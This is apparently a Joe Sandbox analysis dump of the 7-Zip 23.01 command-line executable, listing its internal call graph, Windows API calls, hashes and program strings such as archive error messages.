33490 fad563 33489->33490 33491 faa074 VariantClear 33490->33491 33501 fad580 33490->33501 33491->33501 33492 fad7fb 33712 f75a4c 11 API calls 33492->33712 33493 fad731 33711 fad19c 21 API calls 33493->33711 33494 fad6c1 33497 f73730 4 API calls 33494->33497 33498 fad6ff 33494->33498 33497->33498 33498->33492 33498->33493 33499 fad637 33503 fad65a 33499->33503 33510 fad614 33499->33510 33710 fac8e4 15 API calls 33499->33710 33500 f7be6c VariantClear 33500->33486 33501->33486 33501->33494 33501->33499 33501->33510 33709 f73850 malloc _CxxThrowException SysStringLen free 33501->33709 33507 f7be6c VariantClear 33503->33507 33504 fad743 33504->33486 33505 f73730 4 API calls 33504->33505 33512 fad794 33504->33512 33505->33512 33507->33494 33508 fad7e5 free free 33508->33486 33509 fad67f 33509->33510 33511 faa074 VariantClear 33509->33511 33510->33500 33513 fad6a0 33511->33513 33512->33486 33512->33508 33513->33503 33513->33510 33515 f8a2c9 33514->33515 33516 f8a2d0 33515->33516 33517 f8a2dd 33515->33517 33518 f8a2fe 33515->33518 33519 f7be6c VariantClear 33516->33519 33713 f73850 malloc _CxxThrowException SysStringLen free 33517->33713 33518->33516 33521 f8a2fc 33518->33521 33522 f8a313 33519->33522 33523 f7be6c VariantClear 33521->33523 33522->33472 33565 faa074 33522->33565 33524 f8a324 33523->33524 33525 f8a352 33524->33525 33526 f8a35f 33524->33526 33527 f8a380 33524->33527 33528 f7be6c VariantClear 33525->33528 33714 f73850 malloc _CxxThrowException SysStringLen free 33526->33714 33527->33525 33530 f8a37e 33527->33530 33528->33522 33531 f7be6c VariantClear 33530->33531 33532 f8a3a6 33531->33532 33532->33522 33533 f8a544 33532->33533 33534 f7354c 2 API calls 33532->33534 33533->33522 33538 f8a599 33533->33538 33717 f73cb8 memmove 33533->33717 33536 f8a456 33534->33536 33537 f7354c 2 API calls 33536->33537 33539 f8a461 33537->33539 33544 f8a5d0 33538->33544 33718 f73cb8 memmove 33538->33718 33540 f72db8 2 API calls 33539->33540 33542 f8a46f 33540->33542 33715 f7a0bc 
6 API calls 33542->33715 33544->33522 33719 f75a4c 11 API calls 33544->33719 33545 f8a48a 33547 f8a523 free free free 33545->33547 33716 f7a2b4 13 API calls 33545->33716 33547->33533 33549 f8a65b 33721 f88db8 free free memmove 33549->33721 33551 f8a4a9 33553 f73798 4 API calls 33551->33553 33552 f8a66b 33555 f9efc0 7 API calls 33552->33555 33556 f8a4b9 free 33553->33556 33558 f8a67a 33555->33558 33563 f8a4df 33556->33563 33557 f8a61a 33557->33549 33557->33552 33720 f74ee4 CharUpperW CharUpperW 33557->33720 33559 f73798 4 API calls 33558->33559 33560 f8a68a free 33559->33560 33561 f8a6d1 free 33560->33561 33562 f8a6a3 33560->33562 33561->33522 33562->33561 33564 f8a6bc free free 33562->33564 33563->33547 33564->33562 33567 faa0a4 33565->33567 33566 f7be6c VariantClear 33568 f8b840 33566->33568 33567->33566 33568->33453 33568->33472 33722 f870a4 33569->33722 33572 f8b576 33572->33472 33573 faa074 VariantClear 33574 f8acf8 33573->33574 33574->33572 33740 f8a7e4 33574->33740 33577 f9efc0 7 API calls 33578 f8ad19 33577->33578 33579 f8ad2b 33578->33579 33856 f8a9fc 131 API calls 33578->33856 33581 f736a8 3 API calls 33579->33581 33582 f8ad3a 33581->33582 33585 f8ad7e 33582->33585 33857 f86330 7 API calls 33582->33857 33584 f8ad65 33586 f73798 4 API calls 33584->33586 33588 f8ae93 33585->33588 33593 f7354c 2 API calls 33585->33593 33587 f8ad73 free 33586->33587 33587->33585 33589 f8ae9b 33588->33589 33590 f8aef3 33588->33590 33592 f73798 4 API calls 33589->33592 33591 f8af35 33590->33591 33768 f8728c 33590->33768 33596 f73798 4 API calls 33591->33596 33595 f8aeac 33592->33595 33608 f8adae free 33593->33608 33598 f8aec5 33595->33598 33860 f77088 48 API calls 33595->33860 33599 f8af4a 33596->33599 33598->33591 33604 f8aed5 33598->33604 33605 f8af53 free 33599->33605 33606 f8af66 33599->33606 33600 f8af0e free 33609 f8b56a free 33600->33609 33601 f8af20 33601->33591 33610 f8af25 free 33601->33610 33612 f8aee3 free 33604->33612 33613 f87b1c 14 API calls 33604->33613 
33605->33609 33607 f8af6e 33606->33607 33623 f8afd9 33606->33623 33861 f882c8 218 API calls 33607->33861 33608->33588 33611 f8ae0c 33608->33611 33609->33572 33610->33609 33616 f73798 4 API calls 33611->33616 33612->33609 33617 f8aee2 33613->33617 33615 f8b0aa 33620 f72350 2 API calls 33615->33620 33619 f8ae27 33616->33619 33617->33612 33618 f8af91 33621 f8afa9 33618->33621 33622 f8af97 free 33618->33622 33624 f8ae3d 33619->33624 33858 f732b0 _CxxThrowException 33619->33858 33632 f8b12a 33620->33632 33626 f8afc6 free 33621->33626 33630 f87b1c 14 API calls 33621->33630 33622->33609 33623->33615 33862 f860f4 VariantClear _CxxThrowException _CxxThrowException 33623->33862 33625 f736a8 3 API calls 33624->33625 33629 f8ae6e 33625->33629 33626->33609 33859 f9edf0 malloc _CxxThrowException free 33629->33859 33630->33626 33631 f8b015 33634 f8b01b free 33631->33634 33647 f8b02d 33631->33647 33850 f7a008 33632->33850 33634->33609 33635 f8ae79 33637 f739ac 6 API calls 33635->33637 33639 f8ae88 free 33637->33639 33639->33588 33640 f8b196 33866 f86e88 14 API calls 33640->33866 33642 f8b40e 33646 f8b4cd 33642->33646 33658 f736a8 3 API calls 33642->33658 33643 f8b1aa 33649 f8b1b0 free 33643->33649 33650 f8b1d1 free 33643->33650 33644 f8b0ac 33863 f77258 50 API calls 33644->33863 33645 f8b09d 33651 f73798 4 API calls 33645->33651 33665 f8b4ee free 33646->33665 33669 f8b2a4 free 33646->33669 33647->33615 33647->33644 33647->33645 33648 f8b1f0 33659 f8b234 33648->33659 33660 f8b33b 33648->33660 33649->33609 33650->33609 33651->33615 33654 f8b0b9 33656 f8b0bd 33654->33656 33657 f8b105 33654->33657 33864 f795e0 GetLastError 33656->33864 33663 f87b1c 14 API calls 33657->33663 33662 f8b43a 33658->33662 33674 f8b278 33659->33674 33675 f8b26c free 33659->33675 33690 f8b28c 33659->33690 33660->33642 33664 f799cc 6 API calls 33660->33664 33686 f8b49c 33662->33686 33869 f87e80 7 API calls 33662->33869 33667 f8b10d free 33663->33667 33668 f8b37d 33664->33668 33665->33609 33666 f8b0c2 33865 
f86f80 13 API calls 33666->33865 33667->33609 33673 f8b3bf 33668->33673 33867 f86e88 14 API calls 33668->33867 33669->33609 33671 f72350 2 API calls 33671->33669 33853 f79784 33673->33853 33680 f72350 2 API calls 33674->33680 33674->33690 33675->33674 33678 f8b0dd 33681 f8b0e3 free 33678->33681 33682 f8b0f5 free 33678->33682 33680->33690 33681->33609 33682->33609 33685 f8b4c3 free 33685->33646 33686->33685 33688 f73798 4 API calls 33686->33688 33687 f8b398 33687->33673 33689 f8b39e free 33687->33689 33691 f8b4c2 33688->33691 33689->33609 33690->33671 33691->33685 33694 f8b3e7 33694->33642 33695 f8b3ed free 33694->33695 33695->33609 33697->33457 33698->33456 33699->33471 33700->33456 33702 f7354c 2 API calls 33701->33702 33704 f9efe9 33702->33704 33703 f8bb42 33703->33469 33703->33475 33707 f732b0 _CxxThrowException 33703->33707 33704->33703 33705 f739ac 6 API calls 33704->33705 33901 f732b0 _CxxThrowException 33704->33901 33705->33704 33708->33488 33710->33509 33711->33504 33712->33486 33715->33545 33716->33551 33717->33538 33718->33538 33719->33557 33720->33557 33721->33552 33723 f870fb 33722->33723 33724 f87101 33723->33724 33726 f8710e 33723->33726 33725 f7be6c VariantClear 33724->33725 33727 f8716a 33725->33727 33728 f7be6c VariantClear 33726->33728 33727->33572 33727->33573 33731 f8717b 33728->33731 33729 f871af 33732 f7be6c VariantClear 33729->33732 33730 f871bc 33733 f7be6c VariantClear 33730->33733 33731->33729 33731->33730 33732->33727 33734 f871f1 33733->33734 33870 f86d18 VariantClear 33734->33870 33736 f87208 33736->33727 33871 f86d18 VariantClear 33736->33871 33738 f87223 33738->33727 33872 f86d18 VariantClear 33738->33872 33741 f8a802 33740->33741 33743 f8a834 33741->33743 33873 f9f078 17 API calls 33741->33873 33744 f8a98c 33743->33744 33745 f736a8 3 API calls 33743->33745 33744->33577 33746 f8a852 33745->33746 33874 f9edf0 malloc _CxxThrowException free 33746->33874 33748 f8a85d 33749 f8a86a 33748->33749 33750 f8a8c3 33748->33750 33751 fb5a44 5 API 
calls 33749->33751 33752 f8a890 33750->33752 33875 f7553c wcscmp 33750->33875 33755 f8a876 33751->33755 33753 f8a957 33752->33753 33876 f732b0 _CxxThrowException 33752->33876 33756 f739ac 6 API calls 33753->33756 33757 f72350 2 API calls 33755->33757 33760 f8a981 free 33756->33760 33761 f8a87e 33757->33761 33759 f8a8d5 33759->33752 33762 fb5a44 5 API calls 33759->33762 33760->33744 33761->33752 33764 f7354c 2 API calls 33761->33764 33763 f8a8e5 33762->33763 33765 f72350 2 API calls 33763->33765 33764->33752 33766 f8a8ef 33765->33766 33766->33752 33767 f7354c 2 API calls 33766->33767 33767->33752 33769 f872bd 33768->33769 33770 f7354c 2 API calls 33769->33770 33771 f872ca 33770->33771 33772 f788ec 102 API calls 33771->33772 33773 f872db 33772->33773 33779 f875f9 33773->33779 33781 f872e5 33773->33781 33774 f875e5 free 33778 f876b5 33774->33778 33775 f8744b 33776 f87490 33775->33776 33777 f87451 33775->33777 33783 f8749a 33776->33783 33784 f87562 33776->33784 33889 f7e70c 106 API calls 33777->33889 33778->33600 33778->33601 33780 f876a3 free 33779->33780 33788 f736a8 3 API calls 33779->33788 33780->33778 33781->33775 33805 f872eb 33781->33805 33888 f85f40 malloc _CxxThrowException memmove 33781->33888 33789 f736a8 3 API calls 33783->33789 33785 f8759c 33784->33785 33786 f87570 33784->33786 33898 f79164 103 API calls 33785->33898 33896 f77088 48 API calls 33786->33896 33787 f87459 33792 f8745d 33787->33792 33793 f87484 33787->33793 33807 f87629 33788->33807 33795 f874a7 33789->33795 33890 f86e00 7 API calls 33792->33890 33793->33780 33891 f7e70c 106 API calls 33795->33891 33796 f87312 33798 f734d0 4 API calls 33796->33798 33803 f87328 free 33798->33803 33799 f87578 33799->33780 33804 f87580 33799->33804 33801 f875a4 33801->33780 33806 f875ac 33801->33806 33802 f874b2 33808 f874f5 33802->33808 33809 f874b6 33802->33809 33815 f873a7 33803->33815 33897 f86e88 14 API calls 33804->33897 33805->33774 33899 f77474 56 API calls 33806->33899 33813 f7354c 2 API calls 
33807->33813 33893 f77130 50 API calls 33808->33893 33892 f86e00 7 API calls 33809->33892 33812 f875b4 33812->33780 33817 f875bc GetLastError 33812->33817 33818 f87657 33813->33818 33820 f873ae free 33815->33820 33826 f873c1 33815->33826 33817->33780 33822 f875cb 33817->33822 33823 f788ec 102 API calls 33818->33823 33819 f874c8 33824 f874ce free 33819->33824 33825 f874e0 free 33819->33825 33820->33774 33821 f87502 33828 f87553 free 33821->33828 33829 f87506 33821->33829 33900 f86e88 14 API calls 33822->33900 33831 f8766d 33823->33831 33824->33774 33825->33774 33827 f87441 free 33826->33827 33832 f8740a 33826->33832 33836 f8742a free 33826->33836 33837 f873d4 33826->33837 33827->33775 33828->33780 33894 f795e0 GetLastError 33829->33894 33835 f8768b free free 33831->33835 33877 f76fcc 33831->33877 33832->33827 33834 f875dd 33834->33774 33835->33780 33836->33774 33839 f873d8 33837->33839 33840 f87413 free 33837->33840 33838 f8750b 33895 f86f80 13 API calls 33838->33895 33839->33832 33843 f873dc 33839->33843 33840->33774 33846 f873e0 free 33843->33846 33847 f873f5 free 33843->33847 33844 f87526 33848 f8752c free 33844->33848 33849 f8753e free 33844->33849 33846->33774 33847->33774 33848->33774 33849->33774 33851 f79a94 48 API calls 33850->33851 33852 f7a02a 33851->33852 33852->33640 33852->33648 33854 f796f8 5 API calls 33853->33854 33855 f797a0 33854->33855 33855->33642 33868 f86e88 14 API calls 33855->33868 33856->33579 33857->33584 33859->33635 33860->33598 33861->33618 33862->33631 33863->33654 33864->33666 33865->33678 33866->33643 33867->33687 33868->33694 33869->33686 33870->33736 33871->33738 33872->33727 33873->33743 33874->33748 33875->33759 33878 f76fe7 33877->33878 33879 f77001 33878->33879 33880 f76fee SetFileAttributesW 33878->33880 33881 f76ffd 33879->33881 33882 f7354c 2 API calls 33879->33882 33880->33879 33880->33881 33881->33835 33883 f7700f 33882->33883 33884 f7b8b0 44 API calls 33883->33884 33885 f77024 33884->33885 33886 f77048 free 33885->33886 
33887 f77028 SetFileAttributesW free 33885->33887 33886->33881 33887->33881 33888->33796 33889->33787 33890->33805 33891->33802 33892->33819 33893->33821 33894->33838 33895->33844 33896->33799 33897->33805 33898->33801 33899->33812 33900->33834 33902 fad9ee 33904 fad9f4 33902->33904 33903 f75110 3 API calls 33905 fada99 33903->33905 33904->33903 33906 f7354c 2 API calls 33905->33906 33907 fadaa4 33906->33907 33908 fadad4 33907->33908 33909 f73730 4 API calls 33907->33909 33910 f72350 2 API calls 33908->33910 33911 fadb1a 33908->33911 33909->33908 33910->33911 33941 f98ad8 33911->33941 33913 fae4ac 33914 f72350 2 API calls 33913->33914 33924 fae4da 33913->33924 33914->33924 33915 fae9e4 free free free free 33919 fb182e free 33915->33919 33916 fadb98 33916->33913 33918 fae48a free free free 33916->33918 33918->33919 33920 fb23f7 33919->33920 33922 fae9f0 free free free free 33922->33919 33923 faea1b free free free free 33923->33919 33924->33915 33924->33922 33924->33923 33925 faea46 free free free free 33924->33925 33928 faea85 free free free free 33924->33928 33930 faeaca free free free free 33924->33930 33932 faeb4e free free free free 33924->33932 33934 faeb90 free free free free 33924->33934 33935 f73798 malloc _CxxThrowException free memmove 33924->33935 33937 faebcf free free free free 33924->33937 33939 faeb09 free free free free 33924->33939 33950 fac940 33924->33950 33954 faa408 6 API calls 33924->33954 33925->33919 33928->33919 33930->33919 33932->33919 33934->33919 33935->33924 33937->33919 33939->33919 33942 f98aeb 33941->33942 33943 f98b54 33941->33943 33944 f98b0e 33942->33944 33945 f98af4 _CxxThrowException 33942->33945 33943->33916 33946 f72350 2 API calls 33944->33946 33945->33944 33947 f98b2a 33946->33947 33948 f98b33 memmove 33947->33948 33949 f98b46 free 33947->33949 33948->33949 33949->33943 33951 fac968 33950->33951 33953 fac978 33951->33953 33955 fb4c98 19 API calls 33951->33955 33953->33924 33954->33924 33955->33953 33956 f7eae0 33957 f7eafd 
33956->33957 33961 f7eaf3 33956->33961 33958 f796f8 5 API calls 33957->33958 33957->33961 33959 f7eb5b 33958->33959 33960 f7eb63 GetLastError 33959->33960 33959->33961 33960->33961 33962 f7f3a0 33963 f7f3b2 33962->33963 33964 f7f3c1 33962->33964 33967 f7e8c4 33963->33967 33970 fcd8a0 VirtualFree 33967->33970 33969 f7e919 33970->33969 33971 f83760 34025 f71648 33971->34025 33974 f837ca _isatty _isatty _isatty 33977 f8381d 33974->33977 33976 f837b8 _CxxThrowException 33976->33974 33986 f83892 33977->33986 34047 f82c88 9 API calls 33977->34047 33979 f8387a 33980 f72ecc 3 API calls 33979->33980 33981 f83887 free 33980->33981 33981->33986 33982 f83934 34040 f7bd0c GetCurrentProcess OpenProcessToken 33982->34040 33985 f7bd0c 6 API calls 33987 f839c7 33985->33987 33986->33982 34048 f986a8 7 API calls 33986->34048 33989 f83a72 33987->33989 33991 f839f9 wcscmp 33987->33991 33992 f839f2 33987->33992 33993 f83b97 33989->33993 33995 f72db8 2 API calls 33989->33995 33990 f83969 _CxxThrowException 33990->33982 33991->33992 33994 f83a0e 33991->33994 34050 f7bda4 GetModuleHandleW GetProcAddress 33992->34050 33994->33992 33999 f83a23 33994->33999 33997 f83aa0 33995->33997 34052 f72f28 malloc _CxxThrowException free 33997->34052 33998 f83a55 33998->33989 34051 fcd8c0 GetModuleHandleW GetProcAddress 33998->34051 34049 f986a8 7 API calls 33999->34049 34003 f83aae 34053 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 34003->34053 34004 f83a5e 34007 f7bd0c 6 API calls 34004->34007 34005 f83a37 _CxxThrowException 34005->33992 34008 f83a6c 34007->34008 34008->33989 34009 f83abd 34010 f83b19 34009->34010 34054 f986a8 7 API calls 34009->34054 34055 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 34010->34055 34012 f83b07 _CxxThrowException 34012->34010 34014 f83b33 GetCurrentProcess SetProcessAffinityMask 34015 f83b4a GetLastError 34014->34015 34016 f83b84 34014->34016 34056 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 34015->34056 34058 
f73920 _CxxThrowException 34016->34058 34019 f83b8c free 34019->33993 34020 f83b61 34057 f76d34 10 API calls 34020->34057 34022 f83b6d 34023 f739ac 6 API calls 34022->34023 34024 f83b79 free 34023->34024 34024->34016 34026 f7169f 34025->34026 34027 f716cb 34025->34027 34026->34027 34030 f716b7 free free 34026->34030 34028 f71701 34027->34028 34031 f716f9 free 34027->34031 34029 f72350 2 API calls 34028->34029 34034 f71719 34029->34034 34030->34026 34031->34028 34032 f71805 34032->33974 34046 f986a8 7 API calls 34032->34046 34033 fb5a44 5 API calls 34033->34034 34034->34032 34034->34033 34035 f72350 2 API calls 34034->34035 34037 f736a8 3 API calls 34034->34037 34038 f71807 34034->34038 34059 f7138c 9 API calls 34034->34059 34035->34034 34037->34034 34039 f73798 4 API calls 34038->34039 34039->34032 34041 f7bd37 LookupPrivilegeValueW 34040->34041 34042 f7bd98 34040->34042 34043 f7bd8d CloseHandle 34041->34043 34044 f7bd4b AdjustTokenPrivileges 34041->34044 34042->33985 34043->34042 34044->34043 34045 f7bd82 GetLastError 34044->34045 34045->34043 34046->33976 34047->33979 34048->33990 34049->34005 34050->33998 34051->34004 34052->34003 34053->34009 34054->34012 34055->34014 34056->34020 34057->34022 34058->34019 34059->34034 34060 fce286 34061 fce29d __set_app_type 34060->34061 34062 fce2e1 34061->34062 34063 fce2ea __setusermatherr 34062->34063 34064 fce2f7 _initterm __getmainargs _initterm 34062->34064 34063->34064 34065 fce371 34064->34065 34066 fce37b _cexit 34065->34066 34067 fce383 34065->34067 34066->34067 34068 fc8806 34069 fc8823 34068->34069 34070 fc880b fputs 34068->34070 34072 fc8844 34069->34072 34480 f72790 34069->34480 34243 f724c4 fputc 34070->34243 34244 f85134 34072->34244 34076 fc88b9 GetStdHandle GetConsoleScreenBufferInfo 34077 fc88da 34076->34077 34078 f72350 2 API calls 34077->34078 34079 fc88ed 34078->34079 34368 fc7b78 34079->34368 34083 fc89ec 34084 fc8a0e 34083->34084 34085 fc89f2 _CxxThrowException 34083->34085 34414 fa2250 34084->34414 
34085->34084 34088 f7354c 2 API calls 34089 fc8a32 34088->34089 34439 fa827c 34089->34439 34092 fc8a82 free 34099 fc8a9c 34092->34099 34094 fc8a6d 34095 f72790 14 API calls 34094->34095 34097 fc8a78 34095->34097 34096 fc8b40 34448 fb2c2c 34096->34448 34488 f724c4 fputc 34097->34488 34099->34096 34102 fc8b1c _CxxThrowException 34099->34102 34489 f73600 34099->34489 34102->34096 34104 fc8a80 34104->34092 34105 fc8b72 _CxxThrowException 34112 fc8b96 34105->34112 34107 fc8c34 34118 fc8cb1 34107->34118 34495 f7e07c 25 API calls 34107->34495 34108 f739ac 6 API calls 34110 fc8af2 34108->34110 34113 f736a8 3 API calls 34110->34113 34112->34107 34115 fc8c38 _CxxThrowException 34112->34115 34493 fa8ba4 12 API calls 34112->34493 34494 fc78dc 6 API calls 34112->34494 34116 fc8b07 _CxxThrowException 34113->34116 34114 fc8c91 34117 fc8c95 _CxxThrowException 34114->34117 34114->34118 34115->34107 34116->34102 34117->34118 34462 f724c4 fputc 34118->34462 34120 fc8c15 free 34120->34107 34120->34112 34122 fc8ce9 fputs 34463 f724c4 fputc 34122->34463 34124 fc8d01 34166 fc8de8 34124->34166 34496 fc62b4 fputc fputs fputs fputc 34124->34496 34497 f724c4 fputc 34124->34497 34127 fc8df2 fputs 34465 f724c4 fputc 34127->34465 34131 fc8e0a strlen strlen 34133 fc91e2 34131->34133 34136 fc8e48 34131->34136 34466 f724c4 fputc 34133->34466 34498 fc62b4 fputc fputs fputs fputc 34136->34498 34138 fc91f2 fputs 34467 f724c4 fputc 34138->34467 34150 fc9226 fputs fputc 34154 fc924d fputc 34150->34154 34155 fc920a 34150->34155 34159 fc9263 fputc fputc fputc fputc 34154->34159 34155->34150 34217 fc9319 34155->34217 34499 f7260c fputs 34155->34499 34161 fc92ce 34159->34161 34500 fc6260 fputc fputs 34161->34500 34164 fc94bc 34468 f724c4 fputc 34164->34468 34464 f724c4 fputc 34166->34464 34169 fc94c4 fputs 34469 f724c4 fputc 34169->34469 34179 fc94f2 fputs fputc 34183 fc94dc 34179->34183 34183->34179 34215 fc959f 34183->34215 34508 fc6260 fputc fputs 34183->34508 34187 fc9691 34193 fca860 34187->34193 
34197 fca85b 34187->34197 34190 fc937a fputc 34190->34217 34198 fca865 _CxxThrowException 34193->34198 34199 fca882 free 34193->34199 34512 fc6550 33 API calls 34197->34512 34198->34199 34203 fca8bd free 34199->34203 34204 fca89f 34199->34204 34212 fca8d3 34203->34212 34211 fca8a3 free 34204->34211 34205 fc939c fputc 34205->34217 34211->34203 34211->34211 34470 fc738c 34212->34470 34214 fc93bc fputc 34214->34217 34215->34187 34509 fc62b4 fputc fputs fputs fputc 34215->34509 34510 fa7b24 VariantClear 34215->34510 34511 fc6260 fputc fputs 34215->34511 34217->34164 34217->34190 34217->34205 34217->34214 34219 fc93e4 fputc fputc 34217->34219 34501 fc62b4 fputc fputs fputs fputc 34217->34501 34502 fa77dc VariantClear 34217->34502 34503 f7260c fputs 34217->34503 34504 fa7864 VariantClear 34219->34504 34231 fc942c 34505 fc6260 fputc fputs 34231->34505 34506 fa78ec malloc _CxxThrowException free VariantClear 34231->34506 34235 fc9478 fputc fputs 34507 f724c4 fputc 34235->34507 34239 fc949b free 34239->34164 34239->34217 34243->34069 34245 f8515e 34244->34245 34246 f85184 34244->34246 34558 f986a8 7 API calls 34245->34558 34248 f736a8 3 API calls 34246->34248 34250 f85195 34248->34250 34249 f85172 _CxxThrowException 34249->34246 34251 f851bc free 34250->34251 34254 f85206 free 34250->34254 34559 f986a8 7 API calls 34251->34559 34253 f851dc _CxxThrowException 34253->34250 34256 f8523c 34254->34256 34257 f8524f 34254->34257 34258 f7576c 8 API calls 34256->34258 34259 f85271 34257->34259 34260 f73798 4 API calls 34257->34260 34258->34257 34261 f852bc wcscmp 34259->34261 34269 f852d1 34259->34269 34260->34259 34262 f852dc 34261->34262 34261->34269 34560 f986a8 7 API calls 34262->34560 34263 f8539f 34561 f83c20 11 API calls 34263->34561 34266 f852f0 _CxxThrowException 34266->34269 34267 f853c3 34562 f83c20 11 API calls 34267->34562 34269->34263 34274 f8552a 34269->34274 34270 f853db 34271 f85413 34270->34271 34563 f84624 159 API calls 34270->34563 34279 f85446 34271->34279 34564 
f84624 159 API calls 34271->34564 34565 f986a8 7 API calls 34274->34565 34276 f8553e _CxxThrowException 34276->34279 34277 f855fa 34514 f8443c 34277->34514 34279->34277 34280 f855b4 34279->34280 34566 f986a8 7 API calls 34279->34566 34283 f73798 4 API calls 34280->34283 34286 f855c5 34283->34286 34284 f85679 34288 f856a6 34284->34288 34289 f73798 4 API calls 34284->34289 34285 f855a2 _CxxThrowException 34285->34280 34286->34277 34567 f986a8 7 API calls 34286->34567 34287 f73798 4 API calls 34287->34284 34531 f7576c 34288->34531 34289->34288 34292 f855e8 _CxxThrowException 34292->34277 34296 f85e1d 34297 f85e95 34296->34297 34309 f85e22 34296->34309 34298 f85e9a 34297->34298 34299 f85f16 34297->34299 34304 f76af4 51 API calls 34298->34304 34302 f85f1f _CxxThrowException 34299->34302 34360 f85b03 34299->34360 34300 f85bda 34578 f84e4c 75 API calls 34300->34578 34301 f85b93 34301->34296 34301->34300 34577 f986a8 7 API calls 34301->34577 34308 f85ea9 34304->34308 34306 f85bc8 _CxxThrowException 34306->34300 34307 f85beb 34579 f83d28 34307->34579 34594 f7646c 14 API calls 34308->34594 34309->34360 34593 f986a8 7 API calls 34309->34593 34311 f857b0 34314 f8589e wcscmp 34311->34314 34324 f858b3 34311->34324 34318 f8590e wcscmp 34314->34318 34314->34324 34315 f85eb2 34319 f7576c 8 API calls 34315->34319 34316 f76af4 51 API calls 34316->34324 34317 f85e77 _CxxThrowException 34317->34360 34320 f8592c wcscmp 34318->34320 34318->34324 34319->34360 34322 f85950 34320->34322 34320->34324 34570 f986a8 7 API calls 34322->34570 34324->34316 34327 f85976 34324->34327 34568 f7646c 14 API calls 34324->34568 34569 f986a8 7 API calls 34324->34569 34326 f85cde 34329 f85dbe 34326->34329 34334 f85d4c 34326->34334 34589 f986a8 7 API calls 34326->34589 34335 f859d5 34327->34335 34571 f84624 159 API calls 34327->34571 34333 f85de0 34329->34333 34337 f73798 4 API calls 34329->34337 34330 f85964 _CxxThrowException 34330->34327 34331 f73798 4 API calls 34336 f85cb3 34331->34336 34332 f858fc 
                               [Execution graph, continued: node and edge listing (graph image not recoverable from the text) for subroutines calling _CxxThrowException, malloc, free, memmove, GetProcAddress, LoadLibraryExW, FreeLibrary, VariantClear, SysStringByteLen, SysStringLen, FindClose, GetModuleFileNameW, CharUpperW, wcscmp, GetLastError, WriteFile, fputs and fputc]
                              APIs
                              • fputs.MSVCRT ref: 00FC8815
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • GetStdHandle.KERNEL32 ref: 00FC88BE
                              • GetConsoleScreenBufferInfo.KERNELBASE ref: 00FC88CF
                              • _CxxThrowException.MSVCRT ref: 00FC8A08
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputcfputs
                              • String ID: 7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20$ || $ : $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$Libs:$Unsupported archive type$offset=$wudn
                              • API String ID: 3360184521-3863618374
                              • Opcode ID: fb6856b30bb5f270ac6beb8af17b74fb33742cc34dfaa6e04be398e479e18e2d
                              • Instruction ID: 8b2f5445aedcff1c55479abcbfef25f6034f7727d9e04efd1340da8f2f664ca2
                              • Opcode Fuzzy Hash: fb6856b30bb5f270ac6beb8af17b74fb33742cc34dfaa6e04be398e479e18e2d
                              • Instruction Fuzzy Hash: D082C776304A8286DB74EF25E9913AE7362F785B94F40802BDA8E47B59CF3CC549E740
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$ErrorLastmemmove$malloc
                              • String ID:
                              • API String ID: 707025802-0
                              • Opcode ID: ceaf24fd47fc8341da6eaf501670e25404b62931f2dc33c50ccb912c4fbabdc3
                              • Instruction ID: 565be3d4d1412486d5bb61958a6da9ff0474801451d94da0f913c8a56a2858eb
                              • Opcode Fuzzy Hash: ceaf24fd47fc8341da6eaf501670e25404b62931f2dc33c50ccb912c4fbabdc3
                              • Instruction Fuzzy Hash: 7A928F32A18BC486DB60DB26E9903AEB361F7C5B90F548022DB8D57B19DF7DC851EB01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLastmemset
                              • String ID: Cannot find archive file$The item is a directory
                              • API String ID: 4217778428-1569138187
                              • Opcode ID: 1e3f51e84f81622fbf7d17e567aceea866ec7258f54f7e8f05af78af9bbf3dca
                              • Instruction ID: d2b7e037da2c2ee93cc986c4250b25a197243aa8c32058b08c59c9d49c6cd195
                              • Opcode Fuzzy Hash: 1e3f51e84f81622fbf7d17e567aceea866ec7258f54f7e8f05af78af9bbf3dca
                              • Instruction Fuzzy Hash: DD727833209BC586DBB0EB26E88429EB365F7C9B90F554122DA8E47B29DF3CC455DB01
                              APIs
                              Strings
                              • Cannot create output directory, xrefs: 00F9D7A2
